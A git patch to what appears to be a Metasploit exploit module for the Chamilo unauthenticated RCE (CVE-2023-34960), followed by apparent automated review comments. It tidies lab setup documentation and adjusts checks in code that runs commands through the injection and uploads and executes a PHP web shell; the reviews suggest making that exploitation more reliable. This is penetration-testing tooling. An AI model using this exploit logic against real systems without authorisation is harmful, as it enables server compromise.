From 1db284dcaa4cb6547795b4e22f50401a4fe6cd5b Mon Sep 17 00:00:00 2001
From: "H00die.Gr3y" <38109035+h00die-gr3y@users.noreply.github.com>
Date: Tue, 22 Aug 2023 18:46:25 +0200
Subject: [PATCH] Apply suggestions from code review

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
---
 .../http/chamilo_unauth_rce_cve_2023_34960.md | 21 +++++++------------
 .../http/chamilo_unauth_rce_cve_2023_34960.rb | 4 ++--
 2 files changed, 9 insertions(+), 16 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
index 61954f2fcd..f70258323c 100644
--- a/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
+++ b/documentation/modules/exploit/linux/http/chamilo_unauth_rce_cve_2023_34960.md
@@ -8,21 +8,14 @@ request at the vulnerable endpoint `/main/webservices/additional_webservices.php
 
 Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details.
 
-This module has been tested on:
-- [ ] Ubuntu Linux 22.04
-* Chamilo 1.11.18
-* PHP 7.4
+This module has been tested against Chamilo 1.11.18 on Ubuntu Linux 22.04 with PHP 7.4
 
-**Instructions for an Chamilo installation on Ubuntu 22.04:**
-Download and install Ubuntu 22.04 server on VirtualBox.
-[Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/).
-
-Download and install LAMP on Ubuntu 22.04 server.
-[Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/).
-
-Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
-
-Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).
+### Installation
+Instructions for a Chamilo installation on Ubuntu 22.04:
+1. Download and install Ubuntu 22.04 server on VirtualBox (follow these [instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/)).
+2. Download and install LAMP on Ubuntu 22.04 server (follow these [instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/)).
+3. Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
+4. Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).
 
 ## Verification Steps
 
diff --git a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
index f0bc54d650..fed6203ead 100644
--- a/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
+++ b/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb
@@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Checking if #{peer} can be exploited.")
     marker = Rex::Text.rand_text_alphanumeric(8..16)
     res = execute_command("echo #{marker}")
-    if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body =~ /#{marker}/
+    if res && res.code == 200 && res.body =~ /wsConvertPptResponse/ && res.body.include?(marker)
       CheckCode::Vulnerable
     else
       CheckCode::Safe('No valid response received from the target.')
@@ -203,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :php
       res = upload_webshell
-      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body =~ /wsConvertPptResponse/
+      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')
       register_file_for_cleanup(@webshell_name.to_s)
       execute_php(payload.encoded)
     when :unix_cmd
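Review bot: Two lines below the changed condition, `CheckCode::Safe('No valid response received from the target.')` is also reached when `res` is nil, so a host that timed out or refused the connection is reported as not vulnerable although nothing was learned; Metasploit reserves Safe for a reply that shows the target is unaffected and uses Unknown otherwise. Suggest `return CheckCode::Unknown('No response received from the target.') unless res` before the `if`, keeping Safe for a 200 reply that lacks the echoed marker. The changed line still matches the envelope with `=~ /wsConvertPptResponse/` while the marker now uses `include?`; `res.body.include?('wsConvertPptResponse')` would read consistently with the second hunk. It is also worth saying in a comment that this check is active, since it runs `echo #{marker}` through the injection, e.g. `# Active check: executes a harmless echo on the target to confirm command execution`. The `check` method starts and ends outside this hunk.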
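Review bot: The success test on the changed `fail_with` line accepts any reply carrying a `wsConvertPptResponse` element, which, if the service answers the same way for a failed command as the echo-based `check` hunk suggests it might, does not prove the web shell was written before `execute_php(payload.encoded)` is run against it. If `upload_webshell` can echo a marker generated like the one in `check`, asserting `res.body.include?(marker)` here too would make a failed write fail fast with the existing message instead of an opaque payload error. `@webshell_name.to_s` on the cleanup line hints that the name may be unset on some path; if so, registering an empty string for cleanup is silent, and `register_file_for_cleanup(@webshell_name) if @webshell_name` would be clearer. The `exploit` method starts and ends outside this hunk.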